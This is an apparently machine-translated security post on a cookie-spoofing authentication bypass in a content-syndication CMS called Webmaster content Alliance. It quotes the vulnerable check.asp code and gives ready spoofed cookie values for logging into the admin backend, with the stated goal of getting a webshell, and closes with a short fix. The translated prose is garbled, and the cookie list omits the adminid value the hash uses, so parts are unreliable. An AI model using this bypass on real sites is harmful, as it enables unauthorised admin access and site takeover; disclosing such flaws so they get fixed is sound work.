Webmaster content Alliance is domestic the most widely used of a thief program, but its background verification is not strictly, by the cookie trick, you can bypass the authentication directly into the background, get a webshell in. Website content Alliance, presumably most webmasters are aware of, perhaps joined by one or more of the Alliance. Perhaps some newcomers do not understand, here is a brief introduction about the site content Alliance features:
1, The Free has independent channels, the Union organizers responsible for the updating and maintenance of affiliate webmasters sit back and enjoy; the
2, the affiliate sites are generally the default uniform template, but the webmaster can set up a website head and tail;
3, the webmasters have their own advertising, you can set yourself, and some have to promote the Commission of the Commission; and
4, to join the site and sponsor site visits to promote each other, greatly improving website ranking.
The exploit: the
Verify that the file check. asp vulnerability in the code as follows:
dim CheckAdmin,CheckAdminAll,Administer,tempAdmin,tadmin,Flag,Purview,AdminName if md5(request. cookies("rand")&request. cookies("AdminName")&request. cookies("adminid"))<>request. cookies("check") then errmsg=errmsg+ "<BR>"+"<li>no permissions or login timeout, please press OK to return to re-login." call Error_Msg(Errmsg) response. end end if
cookie spoofing vulnerability it is obvious, as long as the rand+AdminName+adminid md5 ciphertext and the check match can be.
The modified cookie to check=802e5e662c4ebe86c497b15afe0b58fd; rand=1; AdminName=admin
Fix: this system is recommended to use session authentication, or cookie authentication with read from the database password.